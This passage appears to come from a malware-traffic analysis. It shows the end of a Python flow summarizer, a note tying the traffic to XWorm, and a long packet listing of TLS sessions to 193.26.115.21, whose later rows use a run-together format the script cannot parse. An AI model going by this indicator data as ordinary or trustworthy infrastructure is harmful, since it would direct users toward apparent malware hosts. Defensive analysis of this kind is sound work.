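    """'Dec 12, 2024 19:07:08.655844927 CET' -> seconds since midnight (nanoseconds kept)."""
    hh, mm, ss = ts.split()[3].split(":")
    return int(hh) * 3600 + int(mm) * 60 + float(ss)


def parse_rows(text: str) -> List[Tuple[str, int, int, str, str]]:
    """Split ' | '-delimited rows into (timestamp, sport, dport, src_ip, dst_ip)."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, src, dst = (f.strip() for f in line.split("|"))
        rows.append((ts, int(sport), int(dport), src, dst))
    return rows


def build_flows(rows) -> Dict[FlowKey, Flow]:
    flows: Dict[FlowKey, Flow] = {}
    for ts, sport, dport, src, dst in rows:
        fwd: FlowKey = (src, sport, dst, dport)
        rev: FlowKey = (dst, dport, src, sport)
        secs = _seconds_of_day(ts)
        if fwd in flows:                 # client -> server packet of a known flow
            flow = flows[fwd]
            flow.packets_out += 1
        elif rev in flows:               # server -> client packet of a known flow
            flow = flows[rev]
            flow.packets_in += 1
        else:                            # first packet of this 4-tuple: its sender opened the flow
            flow = Flow(client=(src, sport), server=(dst, dport), first_seen=ts,
                        last_seen=ts, first_s=secs, last_s=secs, packets_out=1)
            flows[fwd] = flow
        flow.last_seen = ts
        flow.last_s = secs
    return flows


def summarize(text: str) -> List[dict]:
    """Flow records ordered by first packet, in the shape of a conn.log-style summary."""
    flows = sorted(build_flows(parse_rows(text)).values(), key=lambda f: f.first_s)
    return [{"client": f.client, "server": f.server,
             "packets_out": f.packets_out, "packets_in": f.packets_in,
             "first_seen": f.first_seen, "last_seen": f.last_seen,
             "duration_s": round(f.last_s - f.first_s, 6)} for f in flows]


if __name__ == "__main__":
    for rec in summarize(PACKET_ROWS):
        print(f"{rec['client'][0]}:{rec['client'][1]} -> {rec['server'][0]}:{rec['server'][1]}  "
              f"out={rec['packets_out']} in={rec['packets_in']} dur={rec['duration_s']:.3f}s")
```

Run as-is, the script reports two flows from 192.168.2.8 to 193.26.115.21:443, the first with 12 packets out and 11 in over about 1.84 s. Pasting the remaining rows of the listing extends the summary to the third TLS session on port 49713; the same grouping applied to the later XWorm traffic would show the 49728 -> 7007 connection that the Suricata alerts above were raised on.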
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 19:07:08.655844927 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:08.655859947 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:08.655926943 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:08.666148901 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:08.666161060 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:09.951076031 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:09.951178074 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.137773991 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.137805939 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.138257027 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.138328075 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.143276930 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.187338114 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.490355968 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.490386963 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.490423918 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.490441084 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.490449905 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.490483999 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.490539074 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.490583897 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.492981911 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.492994070 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:11.429455042 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:11.429505110 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:11.429568052 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:11.436352015 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:11.436366081 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:12.718425035 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:12.718502998 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:12.737925053 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:12.737938881 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:12.738693953 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:12.783432007 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:12.892533064 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:12.939336061 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.250845909 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.250922918 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.250945091 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.250978947 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.250998974 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.251008034 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.299060106 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.455355883 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.455399990 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.455418110 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.455441952 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.455487967 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.455498934 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.455507994 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.455535889 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.455540895 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.455562115 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.455569029 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.497551918 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.497600079 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.497629881 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.497644901 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.497668982 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.497684956 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.639379025 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.639447927 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.639462948 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.639475107 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.639503956 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.639517069 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.659466028 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.659513950 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.659531116 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.659547091 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.659571886 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.659585953 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.680689096 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.680742025 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.680758953 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.680778027 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.680790901 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.680815935 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.819014072 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.819082975 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.819106102 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.819123983 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.819154978 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.819173098 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.843755960 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.843801975 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.843837976 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.843856096 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.843894958 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.865118980 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.865179062 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.865207911 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.865221024 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.865257025 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.865286112 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.880785942 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.880841970 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.880878925 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:13.880887985 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:13.880934000 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.009290934 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.009326935 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.009354115 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.009361029 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.009399891 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.019108057 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.019156933 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.019185066 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.019191980 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.019342899 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.031939983 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.031987906 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.032011986 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.032022953 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.032072067 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.044008970 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.044054985 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.044078112 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.044109106 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.044123888 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.044146061 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.056004047 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.056051970 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.056076050 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.056103945 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.056127071 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.056142092 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.068101883 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.068156958 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.068206072 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.068218946 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.068244934 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.068264008 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.078463078 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.078507900 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.078541994 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.078567028 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.078593016 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.078612089 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.082746983 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.082809925 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.082818985 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.082870960 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.082895994 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:14.082947016 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:14.114881039 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:16.900247097 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:16.900293112 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:16.900435925 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:16.904500008 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:16.904522896 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:18.188618898 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:18.188846111 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:18.467336893 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:18.467374086 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:18.468303919 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:18.479762077 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:18.523339987 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:18.847062111 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:18.847132921 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:18.847193956 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:18.847217083 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:18.929920912 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.044147968 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.044184923 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.044208050 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.044222116 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.044255972 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.044260979 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.044265032 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.044281006 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.044301987 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.044310093 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.044320107 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.044349909 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.082768917 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.082792997 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.082834959 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.082851887 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.082894087 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.082909107 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.082938910 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.225954056 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.226005077 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.226033926 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.226052999 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.226069927 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.226095915 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.253479958 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.253525972 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.253561020 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.253567934 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.253614902 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.253614902 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.280761003 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.280807018 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.280829906 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.280838013 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.280874014 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.280890942 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.299592972 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.299637079 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.299663067 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.299670935 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.299705982 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.299712896 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.418977976 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.419028997 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.419058084 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.419065952 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.419099092 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.419114113 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.433933973 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.433984995 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.434032917 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.434041977 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.434083939 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.434091091 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.449596882 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.449641943 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.449665070 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.449675083 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.449702978 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.449723005 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.465164900 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.465209961 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.465228081 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.465236902 CET | 443 | 49713 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:19.465271950 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:19.465281963 CET | 49713 | 443 | 192.168.2.8 | 193.26.115.21
                                                                          Dec 12, 2024 19:07:19.477814913 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.477859974 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.477906942 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.477912903 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.477962971 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.477972984 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.491329908 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.491377115 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.491420031 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.491426945 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.491472960 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.491494894 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.502265930 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.502307892 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.502326965 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.502334118 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.502377033 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.502393007 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.608236074 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.608283043 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.608309031 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.608326912 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.608360052 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.608375072 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.618278027 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.618320942 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.618370056 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.618376017 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.618403912 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.618421078 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.626281023 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.626327038 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.626354933 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.626362085 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.626435041 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.635286093 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.635345936 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.635356903 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.635371923 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.635421038 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.635437012 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.643949986 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.644000053 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.644033909 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.644040108 CET44349713193.26.115.21192.168.2.8
                                                                          Dec 12, 2024 19:07:19.644081116 CET49713443192.168.2.8193.26.115.21
                                                                          Dec 12, 2024 19:07:19.644088984 CET49713443192.168.2.8193.26.115.21
